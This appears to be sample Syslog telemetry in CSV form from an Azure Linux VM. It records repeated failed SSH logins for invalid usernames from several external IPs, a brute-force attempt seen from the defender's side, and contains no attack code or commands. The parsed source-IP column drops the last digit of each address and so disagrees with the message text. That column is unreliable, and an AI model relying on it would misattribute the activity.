+7099,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:44,UbuntuDevEnv,2019-06-26 17:18:43,auth,UbuntuDevEnv,info,Invalid user sybase from 154.120.242.70 port 54062,47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sybase,154.120.242.7,54062,,
+7100,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:44,UbuntuDevEnv,2019-06-26 17:18:43,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7101,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:44,UbuntuDevEnv,2019-06-26 17:18:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=154.120.242.70,47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,154.120.242.7,,0,
+7102,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:46,UbuntuDevEnv,2019-06-26 17:18:45,auth,UbuntuDevEnv,info,Failed password for invalid user sybase from 154.120.242.70 port 54062 ssh2,47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sybase,154.120.242.7,54062,,
+7103,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:46,UbuntuDevEnv,2019-06-26 17:18:45,auth,UbuntuDevEnv,info,Disconnected from invalid user sybase 154.120.242.70 port 54062 [preauth],47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,sybase,154.120.242.7,54062,,
+7104,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:46,UbuntuDevEnv,2019-06-26 17:18:45,auth,UbuntuDevEnv,info,"Received disconnect from 154.120.242.70 port 54062:11: Normal Shutdown, Thank you for playing [preauth]",47767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,154.120.242.7,54062,,
+7105,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:51,UbuntuDevEnv,2019-06-26 17:18:51,auth,UbuntuDevEnv,info,Invalid user zang from 80.108.220.67 port 59008,47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zang,80.108.220.6,59008,,
+7106,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:51,UbuntuDevEnv,2019-06-26 17:18:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=80.108.220.67,47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,80.108.220.6,,0,
+7107,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:51,UbuntuDevEnv,2019-06-26 17:18:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7108,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:54,UbuntuDevEnv,2019-06-26 17:18:53,auth,UbuntuDevEnv,info,Failed password for invalid user zang from 80.108.220.67 port 59008 ssh2,47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zang,80.108.220.6,59008,,
+7109,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:54,UbuntuDevEnv,2019-06-26 17:18:53,auth,UbuntuDevEnv,info,Disconnected from invalid user zang 80.108.220.67 port 59008 [preauth],47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,zang,80.108.220.6,59008,,
+7110,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:54,UbuntuDevEnv,2019-06-26 17:18:53,auth,UbuntuDevEnv,info,Received disconnect from 80.108.220.67 port 59008:11: Bye Bye [preauth],47781,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,80.108.220.6,59008,,
+7111,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:55,UbuntuDevEnv,2019-06-26 17:18:55,auth,UbuntuDevEnv,info,Invalid user mathias from 74.94.246.82 port 55228,47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mathias,74.94.246.8,55228,,
+7112,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:55,UbuntuDevEnv,2019-06-26 17:18:55,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7113,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:55,UbuntuDevEnv,2019-06-26 17:18:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7114,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:57,UbuntuDevEnv,2019-06-26 17:18:57,auth,UbuntuDevEnv,info,Failed password for invalid user mathias from 74.94.246.82 port 55228 ssh2,47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mathias,74.94.246.8,55228,,
+7115,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:57,UbuntuDevEnv,2019-06-26 17:18:57,auth,UbuntuDevEnv,info,Disconnected from invalid user mathias 74.94.246.82 port 55228 [preauth],47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mathias,74.94.246.8,55228,,
+7116,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:18:57,UbuntuDevEnv,2019-06-26 17:18:57,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 55228:11: Bye Bye [preauth],47811,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,55228,,
+7117,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:32,UbuntuDevEnv,2019-06-26 17:19:32,auth,UbuntuDevEnv,info,Invalid user play from 111.230.29.17 port 33160,47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,play,111.230.29.1,33160,,
+7118,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:32,UbuntuDevEnv,2019-06-26 17:19:32,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7119,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:32,UbuntuDevEnv,2019-06-26 17:19:32,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7120,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:35,UbuntuDevEnv,2019-06-26 17:19:34,auth,UbuntuDevEnv,info,Failed password for invalid user play from 111.230.29.17 port 33160 ssh2,47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,play,111.230.29.1,33160,,
+7121,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:35,UbuntuDevEnv,2019-06-26 17:19:34,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 33160:11: Bye Bye [preauth],47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,33160,,
+7122,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:35,UbuntuDevEnv,2019-06-26 17:19:34,auth,UbuntuDevEnv,info,Disconnected from invalid user play 111.230.29.17 port 33160 [preauth],47946,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,play,111.230.29.1,33160,,
+7123,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:58,UbuntuDevEnv,2019-06-26 17:19:57,auth,UbuntuDevEnv,info,Invalid user ts3 from 77.237.69.165 port 40096,48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,77.237.69.1,40096,,
+7124,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:58,UbuntuDevEnv,2019-06-26 17:19:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7125,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:19:58,UbuntuDevEnv,2019-06-26 17:19:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7126,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:00,UbuntuDevEnv,2019-06-26 17:19:59,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 77.237.69.165 port 40096 ssh2,48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,77.237.69.1,40096,,
+7127,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:00,UbuntuDevEnv,2019-06-26 17:19:59,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 40096:11: Bye Bye [preauth],48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,40096,,
+7128,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:00,UbuntuDevEnv,2019-06-26 17:19:59,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 77.237.69.165 port 40096 [preauth],48037,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,77.237.69.1,40096,,
+7129,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:24,UbuntuDevEnv,2019-06-26 17:20:24,auth,UbuntuDevEnv,info,Invalid user prudence from 171.8.199.77 port 38740,48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prudence,171.8.199.7,38740,,
+7130,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:24,UbuntuDevEnv,2019-06-26 17:20:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+7131,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:24,UbuntuDevEnv,2019-06-26 17:20:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7132,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:27,UbuntuDevEnv,2019-06-26 17:20:26,auth,UbuntuDevEnv,info,Failed password for invalid user prudence from 171.8.199.77 port 38740 ssh2,48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prudence,171.8.199.7,38740,,
+7133,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:27,UbuntuDevEnv,2019-06-26 17:20:27,auth,UbuntuDevEnv,info,Disconnected from invalid user prudence 171.8.199.77 port 38740 [preauth],48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,prudence,171.8.199.7,38740,,
+7134,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:27,UbuntuDevEnv,2019-06-26 17:20:27,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 38740:11: Bye Bye [preauth],48126,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,38740,,
+7135,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:32,UbuntuDevEnv,2019-06-26 17:20:31,auth,UbuntuDevEnv,info,Invalid user hei from 74.94.246.82 port 44190,48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hei,74.94.246.8,44190,,
+7136,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:32,UbuntuDevEnv,2019-06-26 17:20:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7137,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:32,UbuntuDevEnv,2019-06-26 17:20:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7138,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:34,UbuntuDevEnv,2019-06-26 17:20:34,auth,UbuntuDevEnv,info,Failed password for invalid user hei from 74.94.246.82 port 44190 ssh2,48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hei,74.94.246.8,44190,,
+7139,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:34,UbuntuDevEnv,2019-06-26 17:20:34,auth,UbuntuDevEnv,info,Disconnected from invalid user hei 74.94.246.82 port 44190 [preauth],48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hei,74.94.246.8,44190,,
+7140,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:20:34,UbuntuDevEnv,2019-06-26 17:20:34,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 44190:11: Bye Bye [preauth],48168,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,44190,,
+7141,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:10,UbuntuDevEnv,2019-06-26 17:21:09,auth,UbuntuDevEnv,info,Invalid user git from 111.230.29.17 port 46544,48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,111.230.29.1,46544,,
+7142,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:10,UbuntuDevEnv,2019-06-26 17:21:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=111.230.29.17,48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,111.230.29.1,,0,
+7143,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:10,UbuntuDevEnv,2019-06-26 17:21:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7144,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:12,UbuntuDevEnv,2019-06-26 17:21:11,auth,UbuntuDevEnv,info,Failed password for invalid user git from 111.230.29.17 port 46544 ssh2,48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,111.230.29.1,46544,,
+7145,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:12,UbuntuDevEnv,2019-06-26 17:21:12,auth,UbuntuDevEnv,info,Received disconnect from 111.230.29.17 port 46544:11: Bye Bye [preauth],48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,111.230.29.1,46544,,
+7146,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:12,UbuntuDevEnv,2019-06-26 17:21:12,auth,UbuntuDevEnv,info,Disconnected from invalid user git 111.230.29.17 port 46544 [preauth],48292,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,111.230.29.1,46544,,
+7147,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:24,UbuntuDevEnv,2019-06-26 17:21:23,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7148,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:24,UbuntuDevEnv,2019-06-26 17:21:23,auth,UbuntuDevEnv,info,Invalid user hadoop from 77.237.69.165 port 47283,48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,77.237.69.1,47283,,
+7149,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:24,UbuntuDevEnv,2019-06-26 17:21:23,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=77.237.69.165,48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,77.237.69.1,,0,
+7150,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:25,UbuntuDevEnv,2019-06-26 17:21:25,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 77.237.69.165 port 47283 ssh2,48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,77.237.69.1,47283,,
+7151,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:26,UbuntuDevEnv,2019-06-26 17:21:25,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 77.237.69.165 port 47283 [preauth],48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,77.237.69.1,47283,,
+7152,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:21:26,UbuntuDevEnv,2019-06-26 17:21:25,auth,UbuntuDevEnv,info,Received disconnect from 77.237.69.165 port 47283:11: Bye Bye [preauth],48345,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,77.237.69.1,47283,,
+7153,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:04,UbuntuDevEnv,2019-06-26 17:22:04,auth,UbuntuDevEnv,info,Invalid user yong from 74.94.246.82 port 33150,48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,74.94.246.8,33150,,
+7154,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:04,UbuntuDevEnv,2019-06-26 17:22:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+7155,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:04,UbuntuDevEnv,2019-06-26 17:22:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82,48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,74.94.246.8,,0,
+7156,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:06,UbuntuDevEnv,2019-06-26 17:22:06,auth,UbuntuDevEnv,info,Failed password for invalid user yong from 74.94.246.82 port 33150 ssh2,48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,74.94.246.8,33150,,
+7157,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:06,UbuntuDevEnv,2019-06-26 17:22:06,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 33150:11: Bye Bye [preauth],48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,33150,,
+7158,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 17:22:06,UbuntuDevEnv,2019-06-26 17:22:06,auth,UbuntuDevEnv,info,Disconnected from invalid user yong 74.94.246.82 port 33150 [preauth],48793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yong,74.94.246.8,33150,,
